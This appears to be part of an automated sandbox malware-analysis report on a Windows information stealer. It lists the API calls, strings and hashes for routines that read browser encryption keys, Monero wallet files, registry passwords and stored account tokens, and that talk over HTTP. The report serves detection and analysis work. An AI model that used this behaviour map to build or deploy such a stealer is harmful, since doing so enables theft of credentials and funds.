                                • Opcode Fuzzy Hash: dcdd0e3db0d91d44b9d88a7b679c05f15d6221067596d861b5df8db472b17f27
                                • Instruction Fuzzy Hash: C3120C71850108AAEB19FBA0DC92FEEB738EF94304F504159F50676191EF342B4ACFA6
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 00936280: InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                                  • Part of subcall function 00936280: StrCmpCA.SHLWAPI(?,015BFC50), ref: 00936303
                                  • Part of subcall function 00936280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                                  • Part of subcall function 00936280: HttpOpenRequestA.WININET(00000000,GET,?,015BF098,00000000,00000000,00400100,00000000), ref: 00936385
                                  • Part of subcall function 00936280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                                  • Part of subcall function 00936280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945318
                                • lstrlen.KERNEL32(00000000), ref: 0094532F
                                  • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00945364
                                • lstrlen.KERNEL32(00000000), ref: 00945383
                                • lstrlen.KERNEL32(00000000), ref: 009453AE
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: ecdf44d4c6e99a0248903150cd85d35bcaaeb67311c9f97b7a5029113082b81f
                                • Instruction ID: e203c15ceb7f9c325d10192dc6ec2b87d81620a60eeb2874638bb7a64aa5fc27
                                • Opcode Fuzzy Hash: ecdf44d4c6e99a0248903150cd85d35bcaaeb67311c9f97b7a5029113082b81f
                                • Instruction Fuzzy Hash: 99510B309501489BEB18FF60C992FED7779EF90309F504018F80A6B5A2EF346B45CB62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 1d92610eaea2c6c70fdb89d5c70c4504655e16713ad40c9d1cd6225c98b2c254
                                • Instruction ID: c8de686e95fe26f56ee319115c97512241bfc2d2e667825dc6ecb1bdc53d3b25
                                • Opcode Fuzzy Hash: 1d92610eaea2c6c70fdb89d5c70c4504655e16713ad40c9d1cd6225c98b2c254
                                • Instruction Fuzzy Hash: 34C173B5940219ABCB14EF60DC89FEE7379BB94304F104598F50AA7281EF74AA85CF91
                                APIs
                                  • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 009442EC
                                • lstrcat.KERNEL32(?,015BF638), ref: 0094430B
                                • lstrcat.KERNEL32(?,?), ref: 0094431F
                                • lstrcat.KERNEL32(?,015BE560), ref: 00944333
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 00948D90: GetFileAttributesA.KERNEL32(00000000,?,00931B54,?,?,0095564C,?,?,00950E1F), ref: 00948D9F
                                  • Part of subcall function 00939CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00939D39
                                  • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                  • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                  • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                  • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                  • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                  • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                  • Part of subcall function 009493C0: GlobalAlloc.KERNEL32(00000000,009443DD,009443DD), ref: 009493D3
                                • StrStrA.SHLWAPI(?,015BF6E0), ref: 009443F3
                                • GlobalFree.KERNEL32(?), ref: 00944512
                                  • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                                  • Part of subcall function 00939AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                                  • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                                  • Part of subcall function 00939AC0: LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 009444A3
                                • StrCmpCA.SHLWAPI(?,009508D1), ref: 009444C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009444D2
                                • lstrcat.KERNEL32(00000000,?), ref: 009444E5
                                • lstrcat.KERNEL32(00000000,00950FB8), ref: 009444F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: d6e9090809c6fb31308a58aa229027eb42465a49981d27f3a6b64a836e78a9d6
                                • Instruction ID: 1f787fe5ee584fafeb7b959d47781e49f97ad1280fc587d6afe38fd8303623bb
                                • Opcode Fuzzy Hash: d6e9090809c6fb31308a58aa229027eb42465a49981d27f3a6b64a836e78a9d6
                                • Instruction Fuzzy Hash: 1B7115B6D10208ABDB14EBA0DC85FEE7379ABC8304F044598F60997181EE75EB45CF92
                                APIs
                                  • Part of subcall function 009312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009312B4
                                  • Part of subcall function 009312A0: RtlAllocateHeap.NTDLL(00000000), ref: 009312BB
                                  • Part of subcall function 009312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009312D7
                                  • Part of subcall function 009312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009312F5
                                  • Part of subcall function 009312A0: RegCloseKey.ADVAPI32(?), ref: 009312FF
                                • lstrcat.KERNEL32(?,00000000), ref: 0093134F
                                • lstrlen.KERNEL32(?), ref: 0093135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00931377
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,015BA2A0,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00931465
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                  • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                  • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                  • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                  • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                  • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 009314EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 108f39e6682dde5e2164deac765bbd98286407efcc4925c66b21b37e8c0bc5a0
                                • Instruction ID: 9e15032d2d827147b0db68e9b4d003ff2e8a9d3dc4c851269376641920693a1a
                                • Opcode Fuzzy Hash: 108f39e6682dde5e2164deac765bbd98286407efcc4925c66b21b37e8c0bc5a0
                                • Instruction Fuzzy Hash: 445154B1D501185BDB15FB60DD92FED733CEF94304F4041A8B60AA2092EE306B89CFA6
                                APIs
                                  • Part of subcall function 009372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0093733A
                                  • Part of subcall function 009372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009373B1
                                  • Part of subcall function 009372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0093740D
                                  • Part of subcall function 009372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00937452
                                  • Part of subcall function 009372D0: HeapFree.KERNEL32(00000000), ref: 00937459
                                • lstrcat.KERNEL32(00000000,009517FC), ref: 00937606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00937648
                                • lstrcat.KERNEL32(00000000, : ), ref: 0093765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0093768F
                                • lstrcat.KERNEL32(00000000,00951804), ref: 009376A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009376D3
                                • lstrcat.KERNEL32(00000000,00951808), ref: 009376ED
                                • task.LIBCPMTD ref: 009376FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: ed170c1031a59bae4a2eb34b40e164c2fdf83f6d28d7e07f4eb24ff70bba11c9
                                • Instruction ID: 5ec647a6c582a957a27727c0308984f9cfbf438bdb31aee4b8468788b4cf05a7
                                • Opcode Fuzzy Hash: ed170c1031a59bae4a2eb34b40e164c2fdf83f6d28d7e07f4eb24ff70bba11c9
                                • Instruction Fuzzy Hash: EA3169B1900209DBCB48EBE4DC96EEFB378ABC5706F104408F116A7290DE34A986CF52
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                  • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                • InternetOpenA.WININET(00950DF7,00000001,00000000,00000000,00000000), ref: 0093610F
                                • StrCmpCA.SHLWAPI(?,015BFC50), ref: 00936147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0093618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009361B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 009361DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0093620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00936249
                                • InternetCloseHandle.WININET(?), ref: 00936253
                                • InternetCloseHandle.WININET(00000000), ref: 00936260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 54bcc6a3f8ecb9d6a785a61451ad29bb9950dc2cf6f50c11704cd22a97bc5c1e
                                • Instruction ID: 18b475e5c52ce719fc412b8c57782533c74d9b380f2c3a393bfd4b5e98a97139
                                • Opcode Fuzzy Hash: 54bcc6a3f8ecb9d6a785a61451ad29bb9950dc2cf6f50c11704cd22a97bc5c1e
                                • Instruction Fuzzy Hash: EB5150B1940218ABEB24DF90DC45FEE77B8EB84705F108498F609A71C1DB74AE85CFA5
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0093733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009373B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0093740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00937452
                                • HeapFree.KERNEL32(00000000), ref: 00937459
                                • task.LIBCPMTD ref: 00937555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: 32ad7f72715e59e818b80398ae87e487bad465dd21286e6336c311c69a937729
                                • Instruction ID: a01cd4bbdf2d3ec8be69b8b4c95613b8877e3545dbc0857546d4a99ea5c42c47
                                • Opcode Fuzzy Hash: 32ad7f72715e59e818b80398ae87e487bad465dd21286e6336c311c69a937729
                                • Instruction Fuzzy Hash: C4610CB590425C9BDB24DB50DD45BDAB7B8BF84304F0081E9E689A6141DF706FC9CF91
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • lstrlen.KERNEL32(00000000), ref: 0093BC9F
                                  • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 0093BCCD
                                • lstrlen.KERNEL32(00000000), ref: 0093BDA5
                                • lstrlen.KERNEL32(00000000), ref: 0093BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 47c537cd11da3c7be5e30773c91bfa169fb18e9d6fec4310d3888bf62f1b9ffd
                                • Instruction ID: 7e6bbebbf11fc6a4978f26e091f0356ef821848f9cd5d54b31cf230e4888db14
                                • Opcode Fuzzy Hash: 47c537cd11da3c7be5e30773c91bfa169fb18e9d6fec4310d3888bf62f1b9ffd
                                • Instruction Fuzzy Hash: 49B14F72950108ABEB14FBA0DC96FEE7339EF94304F404558F506A7191EF346E49CBA6
                                APIs
                                Strings
